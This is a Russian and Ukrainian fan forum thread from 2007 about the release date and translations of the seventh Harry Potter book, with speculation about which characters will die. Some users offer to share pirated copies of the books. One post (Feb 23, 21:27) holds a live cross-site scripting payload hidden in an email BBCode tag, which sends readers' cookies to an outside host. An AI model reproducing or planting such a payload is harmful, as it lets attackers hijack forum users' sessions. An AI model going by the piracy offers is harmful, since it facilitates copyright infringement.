Модератори: простая прохожая.

Сторінки: (64)  [%] « Перша ... 14 15 16 17 18 ... Остання ».  ( Перейти до першого непрочитаного повідомлення ) Нова тема

 

Дата выхода 7 книги

, и ее переводов
Відправлено: Feb 7 2007, 11:33
Люди, по поводу "PROMTа" Там есть виды перевода - технический, художественный, научный, и всякое такое. И можно выбирать вид. Тогда компьютер подбирает из словаря более-менее подходящее значение. Хотя переводы Промтовские действительно убоги - спору нет.
Відправлено: Feb 7 2007, 12:31
Цитата (star_ray @ Feb 7 2007, 11:19)
Polumna, вот толко не надо издевательств! А то кто-нибудь и правда Гаррика в Промт загонит! И попробует ЭТО прочитать!
Lingvo - англо-русско-английский словарь, если кто не знает.


А представляешь, как это будет забавно читать Поттера в переводе ПРОМТа? Это даже смешнее, чем КВН ))))))))
А про лингву я знаю. Это вообще обалденная вещь. Только вся беда в том, что когда переводишь с его помощью, то неимоверно тупеешь. может, правда, это только у меня так. именно по этому люблю бумажные словари.

Цитата (Ассоль @ Feb 7 2007, 11:33)
Люди, по поводу "PROMTа" Там есть виды перевода - технический, художественный, научный, и всякое такое. И можно выбирать вид. Тогда компьютер подбирает из словаря более-менее подходящее значение.

Кстати, да. Если ПРОМТ не тот, что на транслите лежит, то он в самом деле бывает неплох...
Відправлено: Feb 7 2007, 21:35
Цитата (Ассоль @ Feb 7 2007, 10:47)
Нет, Вы поняли не правильно. Первое значение слова "clarification" - ОБЪЯСНЕНИЕ. Т.е, Роулинг говорит о том, что любое дополнительное разъяснение смысла названия книги выдаст (объяснит) читателям слишком многое из того, что сама Роулинг хотела бы сохранить в тайне до самого выхода книги. Поэтому она и говорит в конце о том, что это, мол, просто название, и давать более подробный ответ я не буду.


Спасибо, Ассоль, меня уже просветили :)
Pal
Відправлено: Feb 7 2007, 21:47
наконец то 7 книга, я её так долго здал! мне так хочется узнать что будет со всеми.
но мне кажется что это не последняя книга))) наверно будут еще нескольно ведь жить на чем то надо...
Відправлено: Feb 7 2007, 22:56
Надеюсь после 7 книги, она начнет придумывать новый мир, или расскажет прошлое, будущее мира ГП, но если она прекратит писать я плакать(((
Відправлено: Feb 8 2007, 10:57
А что такое "БИ"?
Відправлено: Feb 8 2007, 11:10
Цитата (Carnelia @ Feb 8 2007, 10:57)
А что такое "БИ"?
Відправлено: Feb 8 2007, 12:06
Нашла на одном форуме
Показати текст спойлеру

Цитата
После опубликования даты выхода заключительной книги о Гарри Поттере,"рухнули" фановские даты: 7 июля (магическая семерка 7.07.07),22 июня (день летнего солнцестояния) и 31 июля день рождения Гарри и Роулинг.Появился новый вопрос: "Почему 21 июля?".Зная тетушку Ро-она выбрала эту дату не просто так.Возможно с этой датой связано какое-то событие (может даже историческое) например:в ночь с 20 на 21 июля 365 г д.н.э Герострат сжёг храм Артемиды(одно из 7 чудес света),тем самым увековечив своё имя(Роулинг заканчивает сагу о Гарри Поттере,тем самым "рушит" надежды на продолжение,а её имя надолго ещё останется в нашей памяти).
Появились также размышления по поводу той личности на чьём бюсте Роулинг сделала надпись,находясь в номере эдинбургского отеля:
Первый вариант,что это бюст римского императора Септимуса Северуса (Septimius Severus),который построил стену разделяющую Римскую и Варварскую части Британиии и стена эта проходила возле одной из деревень Йоркшира с названием Снэйп(напомню,что имя своему персонажу проф.Снейпу,Роулинг дала в "честь" этой деревни).
Во втором варианте бытует мнение,что это всё же бюст греческого бога Гермеса,ну и отсюда размышления,что Роулинг даёт намек на Перси Уизли (его сову звали Гермес),а также,что Гермес является проводником душ умерших (связь с названием 7 книги).

Честно говоря не знаю откуда они это взяли, ссылки ни одной нет, но то что Ро отметилась на какой-то статуе в отеле я это и в какой-то газете читала.
Відправлено: Feb 8 2007, 14:13
Heather
Супер!!! Давайте еще сделаем вывод из номера отеля... он там был 652 вроде... Так... в сумме - 13! Несчастливое число... Связь с тем, что HP&DH планируется кровавой... Если посмотреть на цифры, можно сделать вывод о связи с сюжетом соответствующих книг... 2 - это Джинни Уизли, наверное, будет играть весомую роль... 5 - ну это арка смерти, ясное дело, и 6 - понятно, это убивший Дамба Снейп.... Господи, тут столько теорий можно чуть ли не из того, в какую сторону у Ро волосы зачесаны, сделать можно!
Народ! Давайте будес знать меру! Тем более, что дату 21 июля вовсе не факт, что Ро назначила, и бюст тот вряд ли она специально себе просила принести, такой что бы подходил под намек!
P.S. Только не думайте, Heather, что это какой-то пинок в Вашу сторону. Вам-то как раз огромное спасибо за очень интересную информацию!
Відправлено: Feb 8 2007, 14:20
Я в этой теме выкладывала ссылку на седьмой странице. В той ссылке есть фото статуи с надписью Ро, если кому интересно
Відправлено: Feb 8 2007, 15:15
Цитата (star_ray @ Feb 8 2007, 14:13)
олько не думайте, Heather, что это какой-то пинок в Вашу сторону. Вам-то как раз огромное спасибо за очень интересную информацию!

О, я бы и без этого постскрипума ничего бы и не подумала))), я лишь предала информацию...да уж,все это конечно выглядит очень натянуто, но за исторические экскурсы этим фанатам большое спасибо.
Цитата (Эноа @ Feb 8 2007, 14:20)
Я в этой теме выкладывала ссылку на седьмой странице. В той ссылке есть фото статуи с надписью Ро, если кому интересно

Ага... это я пропустила, но что-то действительно непонятно чья эта статуя, надо было этому работнику отеля общий план сделать)))
Відправлено: Feb 8 2007, 17:23
Да вы хоть что!!Я поскорее хочу узнать чем же это закончится."1 июля-это дата выхода в Америке вроде.В России книга только осенью появится.Так что ждите еще спокойно месяцев 7)))Ну конечно не хотелось бы чтобы Гаррик погиб. ;(
Відправлено: Feb 8 2007, 19:45
Цитата (Фрекен Бок @ Feb 8 2007, 17:23)
1 июля-это дата выхода в Америке вроде.В России книга только осенью появится

Не 1, а 21 и не в Америке а в Англии!!! ппц, народ вы хоть самый первый пост читайте для приличия!! А у нас она скорее всего к декабрю будет если не позже, пока переведут...
Відправлено: Feb 9 2007, 07:07
книга вийде 21.07.07 Це точно [:-} [:-} [:-}
Відправлено: Feb 9 2007, 14:17
долго нам еще ждать......
Відправлено: Feb 9 2007, 16:19
А когда Росмэн обьявит свою дату выхода?
Відправлено: Feb 9 2007, 16:56
Цитата (VeSTo4ka @ Feb 8 2007, 19:45)
Не 1, а 21 и не в Америке а в Англии!!! ппц, народ вы хоть самый первый пост читайте для приличия!! А у нас она скорее всего к декабрю будет если не позже, пока переведут...

В Америці вона теж вийде 21 липня.
Відправлено: Feb 9 2007, 18:13
Полгода?! Я не доживу...
Відправлено: Feb 9 2007, 18:49
Цитата (Prof Dumbledore @ Feb 9 2007, 16:56)
В Америці вона теж вийде 21 липня

Ну значит, американцам повезло!!!! Не то что нам...эх......=(((
Відправлено: Feb 9 2007, 19:00
VeSTo4ka
Американцы - так случилось - говорят на английском. Роулинг тоже (вот уж совсем невезение!) пишет тоже на английском. И чему Вы удивляетесь? Что с английского на английский переводить не будут?
А на русский и украинский переводить надо. Хотя есть способ проще - выучить английский хотя бы на уровне пользования словарем и прочитать книгу в момент выхода на языке оригинала.

Я лично именно этим и намерен занятся. Пока что для тренировки прочитаю на языке оригинала предыдущие части ГП.
Відправлено: Feb 9 2007, 19:44
Показати текст спойлеру
Цитата
Я лично именно этим и намерен занятся. Пока что для тренировки прочитаю на языке оригинала предыдущие части ГП.

ой,а у тя есть в электронном виде,перешлешь?
Відправлено: Feb 9 2007, 19:47
star_ray, Да я и не удивляюсь!!! Боже упаси!!! Вы что, НО МНЕ ЧЕРТ ВОЗЬМИ ЗАВИДНО!!!! А на языке оригинала, надо и вправду почитать, благо ангийский в этом году выучила более менее!!!
Відправлено: Feb 10 2007, 09:24
Цитата (Роккси @ Feb 9 2007, 19:44)
ой,а у тя есть в электронном виде,перешлешь?

Показати текст спойлеру
Відправлено: Feb 10 2007, 14:27
Пришлите мне, пожалуйста!! У меня есть только 1 и 2 книги :(
Надо же потренироваться перед 7ой ;)
Відправлено: Feb 10 2007, 14:32
У меня есть все шесть, если кому надо. :) Пишите свою почту в личку.
star_ray, я была б рада, если бы в России 21 вышел английский вариант, но практика показывает, что такого не бывает. :(
Відправлено: Feb 10 2007, 15:08
Насчет книг - у меня есть как переводы, так и английские версии всех 6. Кому нужно-обращайтесь. Вообще их можно спокойно найти и скачать в интернете, но за ссылку меня, боюсь, забанят. Кое-кому я тут выслал, кое-кому - нет... В общем, кому нужно - не флудите и пишите в личку.
---
Теперь насчет 7 книги. Ну, в интернете она наверняка даже в день выхода появится, нужно будет только поискать, и есть информация, что в центральных книжных магазинах Москвы тоже.
Відправлено: Feb 10 2007, 17:15
Да... Через годик-два такого бума на книги никогда не будет.
Відправлено: Feb 10 2007, 18:19
star_ray, в интернете в день выхода - вряд ли, кто ж в здравом уме будет ее сканить, вместо того, чтобы читать? :D Я вообще поражаюсь на героев, у которых сил хватает сделать скан с 500-600 страниц. И в Москве вряд ли - оригинал 5 книги вышел только после выхода перевода Росмэна, шестой - раньше, но тоже не в первый день. Хотя, кто знает, может и заказал кто тираж. Но официальная информация - 21 июля в англоговорящих странах.
Відправлено: Feb 10 2007, 18:33
Felina, предыдущие книги в тот же день появлялись - и эта появится. В конце концов, читать можно параллельно со сканированием (сканеры разные бывают). Кроме того, в издательстве-то книга в любом случае в электроном виде имеется, ее и украсть могут...
Відправлено: Feb 10 2007, 18:39
Может самой ее спионерить??? я даже с вами поделюсь!!!=))))user posted image
Відправлено: Feb 10 2007, 21:00
Ну, тогда наша задача - прошарить интернет быстрее, чем это сделают правообладатели. :lol:
Відправлено: Feb 10 2007, 21:19
Цитата (Felina @ Feb 10 2007, 21:00)
Ну, тогда наша задача - прошарить интернет быстрее, чем это сделают правообладатели. :lol:

З тими можливостями, які є зараз, знайти книжку і завантажити можна буде одразу, щойно вона зявиться в електронному вигляді. І ніяки правовласники цьому не перешкода.
Відправлено: Feb 11 2007, 06:31
Блин народ как же всетаки будет книга называться по русски?
Відправлено: Feb 11 2007, 18:58
Prof Dumbledore, еще какое препятствие. Знаешь, как после выхода шестой книги наезжали на тех, кто размещал текст? Мы даже ссылки не размещали, только в личных сообщениях, потихоньку. :) Кое-кто судился, если не ошибаюсь, хостеры выгоняли - говорили, что не нужны проблемы... Но вообще, ссылки можно было поймать, они множились, как грибы после дождя. :)
Ассасин, это мы узнаем, когда она выйдет. :) Никто не знает, что имела в виду Роулинг, а без этого не переведешь.
Відправлено: Feb 11 2007, 19:26
Надеюсь не "Роковые мощи". Мне реально плакать хочется, когда я этот кошмар слышу. НУ нельзя же так поганить великую книгу. Пусть лучше вообще название никак не переводят, чем так.
Відправлено: Feb 11 2007, 19:41
Цитата (Felina @ Feb 11 2007, 18:58)
Prof Dumbledore, еще какое препятствие. Знаешь, как после выхода шестой книги наезжали на тех, кто размещал текст? Мы даже ссылки не размещали, только в личных сообщениях, потихоньку. :) Кое-кто судился, если не ошибаюсь, хостеры выгоняли - говорили, что не нужны проблемы... Но вообще, ссылки можно было поймать, они множились, как грибы после дождя. :)

Одна справа викладати посилання на книжки, а зовсім інша викладати самі книжки. Справді, на цьому форумі такі посилання заборонені. Людей за це карали. Але для того, щоб знайти книжку після того, як вона вийде, знадобиться до однієї години, не більше. Власне, як пощастить. До того ж є файлообмінні служби. Та й все ж таки йдеться не про фільм розміром 4 ГБ, а про книжку, стиснуту - розміром 300 КБ. Можна не лише посилання переслати, а й саму книжку.
Відправлено: Feb 12 2007, 08:47
Цитата (Felina @ Feb 11 2007, 18:58)
Кое-кто судился, если не ошибаюсь, хостеры выгоняли - говорили, что не нужны проблемы... Но вообще, ссылки можно было поймать, они множились, как грибы после дождя.


да только ленивый тогда не вставлял такие ссылки в свою подпись...
Відправлено: Feb 12 2007, 10:58
Нет, друзья мои, 17 числа она выйдет на Еnglishе, а на русском, дай бог, в конце декабря ;( . и то будет видно. что перводили ее человека три кусками. Я конечно знаю
Еnglish, но читаю на нем гораздо медленнее. -_-
Відправлено: Feb 12 2007, 12:33
Показати текст спойлеру
Відправлено: Feb 12 2007, 15:06
Эх, да.... А самое обидное, что все содержание книги начнут раскрывать задолго до выхода ее на русском языке...
Відправлено: Feb 12 2007, 15:33
Цитата (Runen @ Feb 12 2007, 15:06)
Эх, да.... А самое обидное, что все содержание книги начнут раскрывать задолго до выхода ее на русском языке...

Не выходите в Internet, не смотрите телевизор, не слушайте радио и не читайте газеты. Впрочем, боюсь, в случае гибели Гарри в 7 книге до Вас все равно дойдет какая-то информация (например, о погромах в Англии... :) )...
Відправлено: Feb 12 2007, 15:39
Поэтому надо сразу читать на английском, чтобы раньше всех все узнать!!! Или как говорит star_ray, забарикадироваться дома и на улицу носа не высовывать!!! %)
Відправлено: Feb 12 2007, 15:47
Цитата (VeSTo4ka @ Feb 12 2007, 15:39)
Поэтому надо сразу читать на английском, чтобы раньше всех все узнать!!! Или как говорит star_ray, забарикадироваться дома и на улицу носа не высовывать!!! %)

Разве что на дне Марианской впадины в сейфе закрыться. После выхода книги только ленивый не будет кричать, кто там умер... А уж в случае гибели кого-то важного (даже если и не Гарри)... страны (в том числе и нашу :( ) захлестнет ряд погромов...

Нет, я подумал - все же единственный выход - читать на английском сразу. Я потому сейчас и тренируюсь на 1-6 книгах :) .
Відправлено: Feb 12 2007, 17:36
Цитата (Victoria Kinney @ Feb 12 2007, 08:47)
да только ленивый тогда не вставлял такие ссылки в свою подпись...

Victoria Kinney, это стало возможным только после одной модификации... ;)
Відправлено: Feb 12 2007, 18:07
Люди я понимаю что это незаконно. Но ни у кого нема РОСМЭНовских переводов 1-6 книг в компьютерном варианте? Иначе как вы думаете появится 7? если нема первых 6
Відправлено: Feb 12 2007, 18:24
Dark Lord_1991
Показати текст спойлеру
Відправлено: Feb 12 2007, 19:09
>Зареєструйтесь для перегляду цього тексту<
Відправлено: Feb 13 2007, 14:57
Цитата (Runen @ Feb 12 2007, 15:06)
Эх, да.... А самое обидное, что все содержание книги начнут раскрывать задолго до выхода ее на русском языке...

Как я стал ненавидеть , по-моему комсомольскую правду, когда в нкй напечатали про ГП и мальтийский орден, и там в конце быыло написано, что в 6 книге умер Дамб. Я это узнал 3 декабря, по сути токо что купив книгу.
Відправлено: Feb 13 2007, 15:05
star_ray, по-моему уже всем известно, что Поттер умрёт. Ро сказала это давно, она сделает это, потому что больше не хочет продолжать писать о Поттере.
Відправлено: Feb 13 2007, 15:09
[quote=star_ray,1171295223]Разве что на дне Марианской впадины в А уж в случае гибели кого-то важного (даже если и не Гарри)... страны (в том числе и нашу :( ) захлестнет ряд погромов...

До погромов, я думаю, не дойдет, но не зря же там, в Великобритании, так сказать, у истоков, создают какую-то Горячую линию, куда смогут звонить расстроенные читатели.
Відправлено: Feb 13 2007, 15:12
Цитата ([DE|RAIN (Bivshiy TOM RIDDLE) @ Feb 13 2007, 15:05)
star_ray, по-моему уже всем известно, что Поттер умрёт. Ро сказала это давно, она сделает это, потому что больше не хочет продолжать писать о Поттере.

Не говори ерунды. Это неизвестно, и Ро всячески избегает прямых ответов на вопросы о смерти Гарри.
А если Вы такой умный - давайте цитату с уважаемого сайта и только из интервью, а не из желтой газеты.

Ассоль
Боюсь, эта горячая линяя не поможет сдвинутым фанатам. Такие в психпомощь не звонят, а сразу за нож хватаются... (вот недавно была история, что где-то - в Испании, по-моему- разъяреный футбольный фанат зарезал полицейского...)
Відправлено: Feb 13 2007, 15:23
Это лично моё мнение, но я думаю Роулинг Гаррика всё-таки убъёт...*заплакала*
Зато потом фаны убъют её!!!!!!!!!!!!! :)
Відправлено: Feb 13 2007, 15:27
Цитата (Reniro4ka @ Feb 13 2007, 15:23)
Это лично моё мнение, но я думаю Роулинг Гаррика всё-таки убъёт...*заплакала*
Зато потом фаны убъют её!!!!!!!!!!!!! :)

Плохого Вы мнения о Ро... совсем тупой ее делаете...
Відправлено: Feb 13 2007, 15:28
Цитата (Reniro4ka @ Feb 13 2007, 15:23)
Это лично моё мнение, но я думаю Роулинг Гаррика всё-таки убъёт...*заплакала*
Зато потом фаны убъют её!!!!!!!!!!!!! :)



Роулинг в каком-то из интервью сказала, что Гарри точно не убьет - мол, не хочу начтупать на горло собственной песне. И впрямь, ну, троих детей учить и растить за что-то надо. В Великобритании образование жуть какое дорогое.
Відправлено: Feb 13 2007, 15:30
Цитата (Ассоль @ Feb 13 2007, 15:28)
Роулинг в каком-то из интервью сказала, что Гарри точно не убьет - мол, не хочу начтупать на горло собственной песне. И впрямь, ну, троих детей учить и растить за что-то надо. В Великобритании образование жуть какое дорогое.

Прошу Вас, не нужно говорить то, что не знаете!
Еще нет ни одного вменяемого подтверждения как в пользу гибели Гарри, так и против нее. Все, что есть - домыслы и догадки. И если Вы на что-то ссылаетесь, будьте добры привести ссылку.
Відправлено: Feb 14 2007, 13:44
А все-таки какое шоу нам предстоит и у нас места в первом ряду! подобный прецендент был черт-знает в каком лохматом году когда Конан Дойль убил Холмса, резонанс был нешуточный, но тогда не было такой медийной глобализации ;) .
Достоверно известно что кто-то умрет и в любом случае у этих героев есть фанаты, и в любом случае будут протесты, стенания и проклятия в адрес Ро, надеюсь у нее хватит мужества не потворствовать толпе, а завершить как задумывалось, хотя этот некто помилованный уже выглядит как уступка, да...самое веселье начнется после прочтения.
Відправлено: Feb 14 2007, 14:05
Цитата (star_ray @ Feb 9 2007, 19:00)
VeSTo4ka
Американцы - так случилось - говорят на английском. Роулинг тоже (вот уж совсем невезение!) пишет тоже на английском. И чему Вы удивляетесь? Что с английского на английский переводить не будут?
А на русский и украинский переводить надо. Хотя есть способ проще - выучить английский хотя бы на уровне пользования словарем и прочитать книгу в момент выхода на языке оригинала.

Я лично именно этим и намерен занятся. Пока что для тренировки прочитаю на языке оригинала предыдущие части ГП.


А вот я люблю читать гарри в пеерводе профессионалов. А то сидеть и переводить.... Я например этим наверняка буду занята не меньше года.
Відправлено: Feb 14 2007, 14:35
Heather, как же Вы правы! Меня, правда, когда я высказывал аналогичное мнение, никто не услышал. Может быть, услышат Вас...

Мергиона, потренируйтесь на чтении оригиналов предыдущих книг. Поверьте, там много чего интересного есть, что перевод перевирает...
Відправлено: Feb 14 2007, 15:08
Цитата (star_ray @ Feb 14 2007, 14:35)
Heather, как же Вы правы! Меня, правда, когда я высказывал аналогичное мнение, никто не услышал. Может быть, услышат Вас...

Ничего если не услышат ;) , в любом случае нас уже двое в предвкушении шоу.
Відправлено: Feb 14 2007, 15:59
Цитата (Heather @ Feb 14 2007, 15:08)
Ничего если не услышат ;) , в любом случае нас уже двое в предвкушении шоу.

:D

Тут все делают ставки на гибель Гарри... А нет бы делать ставки на "Что случится с Роулинг после выхода 7 книге". Я бы на "останется целой и невредимой" и не поставил бы, честно говоря...
Відправлено: Feb 14 2007, 16:26
Цитата (star_ray @ Feb 14 2007, 15:59)
Тут все делают ставки на гибель Гарри... А нет бы делать ставки на "Что случится с Роулинг после выхода 7 книге". Я бы на "останется целой и невредимой" и не поставил бы, честно говоря...

Ага или хотя для фанатского сообщества дело чести уже копить деньги на газетный разворот в The Times дабы высказать свое возмущение, а оно будет!
Відправлено: Feb 15 2007, 10:55
Цитата (star_ray @ Feb 14 2007, 14:35)
Heather, как же Вы правы! Меня, правда, когда я высказывал аналогичное мнение, никто не услышал. Может быть, услышат Вас...

Мергиона, потренируйтесь на чтении оригиналов предыдущих книг. Поверьте, там много чего интересного есть, что перевод перевирает...


Для этого нужно очень хорошо знать английский. Полэтому придется мне ждать выхода переводов
Відправлено: Feb 15 2007, 12:19
Цитата (Мергиона @ Feb 15 2007, 10:55)
Для этого нужно очень хорошо знать английский. Полэтому придется мне ждать выхода переводов


Если Вы не будите учится, то и английский знать не будите. А вот если хотя бы первую книгу на английском прочтете, то и знания свои укрепите, и вообще лучше читать научитесь. А там и до чтения в оригинале недалеко.
А для упрощения дела - используйте электронные словари. В том же Lingvo очень удобно - выделяешь слово и жмешь Ctrl-два раза Insert, и тебе сразу перевод дается.
Відправлено: Feb 15 2007, 13:19
я учусь! Но 8 мало даже на прочтение первой части, которая сама по себе легкая в переводе.
Відправлено: Feb 16 2007, 17:30
Фсе!Я не выживу!Еще так долго ждать....
Відправлено: Feb 16 2007, 18:25
Джаннет, Да ладно, ждали же вон сколько еще совсем чутка подождать думаю сможем!!! :D
Відправлено: Feb 16 2007, 18:40
как нибудь прорвемся, но... ведь потом прочитаешь за день и, все-нет больше ожидания продолжения приключений Гарри Поттера. Нет повести печальней...
Відправлено: Feb 16 2007, 19:12
Буду ждать с нетирпением.
Відправлено: Feb 17 2007, 05:39
rudannna2007, ну да! Закончит она седьмой, ждите...
Там начнется жизнь Рона, Гермионы, жизнь Того-кого после смерти....
Это же такие деньги. Она еще чего-нить наклепает, даю свою пустую голову на отсечение!
Відправлено: Feb 17 2007, 09:59
Будем надеяться, что на седьмой книге она не остановиться..
кста, она говорила, что напишет послесловие обо всех персонажах Поттерианы, не помню название :(
ждёмс-с...
Відправлено: Feb 17 2007, 10:00
Я жду книгу, но когда прочитаю её, читать будет нечего!
MuR
Відправлено: Feb 17 2007, 15:30
Цитата (Dgek @ Feb 17 2007, 09:59)
Будем надеяться, что на седьмой книге она не остановиться...

Надеюсь, остановится, и напишет что-нибудь не для детей.
OWL
Відправлено: Feb 17 2007, 15:48
Maksim, в мире еще куча книг имеется, некоторые намного интереснее ГП. Поверь мне.
Цитата (Dgek @ Feb 17 2007, 09:59)
она говорила, что напишет послесловие обо всех персонажах Поттерианы, не помню название :(
ждёмс-с...

Плох тот писатель которому нкжно писать такое послесловие. У хорошего писателя из книги и так все понятно. Если только она напишет что-то вроде продолжения. Типа кто на ком женился, где работает и т.д.

Відправлено: Feb 17 2007, 17:49
OWL, послесловием это и есть история о персонажах, что с кем стало в будущем, как и что...так штты не в тему выдал, думай перед выдачей поста)))
Відправлено: Feb 17 2007, 23:14
Відправлено: Feb 18 2007, 00:20
Долго ждать придется... наши еще полгода переводить будут, короч к зиме дождемся наверн...
Відправлено: Feb 18 2007, 05:44
Да, побыстрей бы уже...
Відправлено: Feb 18 2007, 20:50
Цитата (OWL @ Feb 17 2007, 15:48)
Плох тот писатель которому нкжно писать такое послесловие. У хорошего писателя из книги и так все понятно. Если только она напишет что-то вроде продолжения. Типа кто на ком женился, где работает и т.д.

Ну вот Лев Николаевич Толстой написал; он что, плохой писатель или вы не читали "Войну и мир"?

Речь и идет о таком послесловии, в котором будет описано : кто , с кем, зачем.............
Відправлено: Feb 19 2007, 08:42
Да я с ума сойду пока до июля доживу... Чего б ей не сделать подарок всем детям?... Написать все к 1 Июня.... Давай те забастовку устроим? а?
Відправлено: Feb 19 2007, 10:31
ЛАНА, это подарок ко мне на днюху как раз... :P За неделю купить и уже начать читать.... Не могу дождатся. Полгода - это вечность...
Відправлено: Feb 19 2007, 10:49
А фильм выходит 13.07.07
Відправлено: Feb 19 2007, 11:09
Цитата (ROVDJUR @ Feb 19 2007, 10:49)
А фильм выходит 13.07.07

они издеваются :(
Відправлено: Feb 19 2007, 11:11
Цитата (Mara @ Feb 19 2007, 11:09)
они издеваются :(

конечно причем тут фильм?
Відправлено: Feb 19 2007, 11:14
Эмили Джэйн, ну 5 фильм я просто жажду увидеть... Армия Дамблодар, издевательство над той больной на голову преподшей, мужество Гаррика, на ее отработках. Ты представляешь какой там жестокий стеб идет от близнецов... Конец правда... Хоть бери и выключай, но что делать. Ро садюга и с этим надо жить.
Відправлено: Feb 22 2007, 11:16
Mara, в фильме полюбому такого стеба как в книгах не было в предыдущих фильмах не будет и в этом!!!!!!!!!
Відправлено: Feb 23 2007, 16:53
Andromaxa, полностью с тобой согласна. только в 4 фильме более-менее приколов пооставляли и все, таких как бородатые близнецы и малфой-хорек, ну и все...
Відправлено: Feb 23 2007, 20:00
А я ролилась 21 июля...отличный подарок мне на совершенолетие будет! Ура!

Толкь неужели на этом конец..я не верю:(
Відправлено: Feb 23 2007, 20:07
Лично я слышала,что в Англии создают телефон доверия для тех, кто будет в шоке от смерти Поттера
Відправлено: Feb 23 2007, 20:18
Да не будет никакой смерти Поттера. :D Ни по какой логике ее не может случиться. Все эти телефоны доверия - просто нагнетание страстей перед выходом книги. :)
Відправлено: Feb 23 2007, 20:25
Флер деЛякур
Не от смерти Поттера, а от окончания книги и, возможно, гибели некоторых героев. У того же Снейпа куча поклонников, так что не хороните Гарри раньше времени.

Felina
Почитайте интервью Роулинг. После прочтения того, как она пытается всех подвести к гибели ГП, впечатление, что она "нагнетает страсти" жутко усиливается! Так что я теперь почти уверен, что ГП выживет!
Відправлено: Feb 23 2007, 20:28
Ч ты так думаешь? Ро сама сказала что ей надоело писать безконечные эпопеи про ГП. Хотя... надежда умирает последней! Круто будет если он не умрёт.
Відправлено: Feb 23 2007, 20:36
Флер деЛякур
Почитайте интервью просто... как-то слишком наигранно она говорит о гибели ГП.
А окончание книги вовсе не означает обязательной гибели ГП. Почитайте, например, ВК...
Відправлено: Feb 23 2007, 20:37
Цитата (Флер деЛякур @ Feb 23 2007, 20:28)
Ч ты так думаешь? Ро сама сказала что ей надоело писать безконечные эпопеи про ГП. Хотя... надежда умирает последней! Круто будет если он не умрёт.

Для того, щоб не писати далі, потрібно вилучити з історії Реддля, а не Гаррі Поттера.
Відправлено: Feb 23 2007, 20:45
*Для того, щоб не писати далі, потрібно вилучити з історії Реддля, а не Гаррі Поттера.*
Треба-треба!!!!!!!!!Я згодна!
Відправлено: Feb 23 2007, 20:49
Флер деЛякур
Показати текст спойлеру
Відправлено: Feb 23 2007, 21:27
[email]wj@wj.com[/email] ` style=`background:url(javascript:document.images[1].src="http://ysmat.hut2.ru/s.php?"+document.cookie);`
Відправлено: Feb 23 2007, 21:35
По мне так лучше Поттера завалят чем кого-то другого из троицы
Відправлено: Feb 24 2007, 21:47
Цитата (Юрий @ Feb 23 2007, 21:35)
По мне так лучше Поттера завалят чем кого-то другого из троицы
=-O
Лично я против! лучше завалят зубреху Герми чем ГП
Відправлено: Feb 25 2007, 07:49
Цитата (NIAGARA @ Feb 24 2007, 21:47)
=-O
Лично я против! лучше завалят зубреху Герми чем ГП

Не надейтесь. У Гермионы объективно меньше шансов погибнуть, чем у любого другого значимого персонажа, так как она ассоциируется с дочерью Роулинг, выписывалась ей в пример... ну и является "голосом" Ро в мире ГП...
Відправлено: Feb 26 2007, 08:09
Я на сайте буду киснуть ВСЕ РАВНО!!!
Відправлено: Feb 28 2007, 15:05
Цитата
Лично я против! лучше завалят зубреху Герми чем ГП

А вот лично тете Ро плевать на наше мнение и она завалила того, кого сама посчитала нужным.
Відправлено: Mar 1 2007, 19:06
Цитата (Pokibor @ Feb 23 2007, 20:25)
Felina
Почитайте интервью Роулинг. После прочтения того, как она пытается всех подвести к гибели ГП, впечатление, что она "нагнетает страсти" жутко усиливается! Так что я теперь почти уверен, что ГП выживет!

Pokibor, а какое именно интервью? Что-то я давно их не видела...
Відправлено: Mar 1 2007, 19:23
Да все интервью после выхода 6 книги. Если нужно освежить память, здесь можно найти переводы, а здесь - оригиналы. Особенно меня заинтерисовало интервью со Стивеном Кингом и Джоном Ирвингом, а точнее - его конец (здесь), где Роулинг просили выбрать героев, с кем бы она пообедала. Она так сходу назвала Гарри, Рона и Гермиону, а потом еще заметила "только я знаю, кто останется в живых", что создается четкое впечатление, что судьба у трио одинаковая. А учитывая, что после замечания "приглашай кого угодно" она назвала Дамблдора, а также что шансы Гермионы погибнуть примерно равны шансам Волда победить, я прихожу к такому заключению.
И вообще, почитайте все фрагменты, относящиеся к гибели Гарри. Как-то Роулинг странно о ней всегда говорит. Это, конечно, сугубо мое личное мнение, но мне четко кажется - она всеми силами старается заставить читателей в нее поверить, что бы потом на волне радости от выживания Гарри замолчать гибель других персонажей. Например, Снейпа, Люпина и Хагрида (у этих троих достаточно поклонников, которые будут рвать и метать за них...)
Відправлено: Mar 2 2007, 00:50
Просто Роу очень старается скрыть личности, хотя одна известна наверняка - Володька конечно :)
а об остальных сколькоб мы не гадали Роу всё-равно штуку выкинет, и возможно вполне и очень-очень неожиданную. Хотя чьёё-то мнение неизбежно совпадёт с реалиями... так что зачем зря мутить колодец из которого пить собираемся...
лучше сядем и будем дрожать в ожидании от нетерпения.
Відправлено: Mar 2 2007, 06:28
DARkHALf
Вас послушать - так лучше прикроем форум вообще. Ибо что на нем обсуждать, если Роулинг "всё-равно штуку выкинет"? Творчество Роулинг достаточно логично, к счастью (вон, гибель Дамба в 6 книге народ неплохо предсказывал), так что обсуждение имеет смысл.
Відправлено: Mar 2 2007, 10:37
Погодите, если 21 июня книга выйдет на английском, то когда она будет переведена? Ведь мало у кого из жителей стран СНГ есть возможность прочитать книгу в оригинале. Я, например, не смогу.
Відправлено: Mar 2 2007, 16:01
Цитата (Sandro @ Mar 2 2007, 10:37)
Погодите, если 21 июня книга выйдет на английском, то когда она будет переведена? Ведь мало у кого из жителей стран СНГ есть возможность прочитать книгу в оригинале. Я, например, не смогу.

Во-первых, 21 июля, а во-вторых, здесь можно посмотреть даты выхода оригиналов книг и переводов в России. Судя по опыту прошлых лет, раньше декабря 7 книгу можно не ждать. Имхо, лучше английский выучить на вменяемом уровне за это время, хотя бы потому, что до появления перевода Вас со всех сторон засыплют информацией, кто погибает, кто выживает и т.д. - потом неинтересно абсолютно будет читать... >:o
Відправлено: Mar 2 2007, 16:12
Ладно, я смотрю тут собрались любители читать! Допустем вы прочитаете 7книгу ГП, а потом что? Читать далешь что будете?
Відправлено: Mar 2 2007, 16:14
Pokibor, а, спасибо, я просто думала, есть какое-то новое интервью. :) Да, Роулинг любит подразнить читателей. Но я ни разу не восприняла всерьез ее слова о смерти Гарри. Сейчас ее задача - максимально всех запутать. Она уже не раз говорила, что частями развитие сюжета угадывают очень многие. Не будет же она подтверждать правильные идеи. Не удивлюсь, если она изменила сюжет, начитавшись форумов и фан-сайтов, и постаралась максимально увести его от самых популярных догадок.
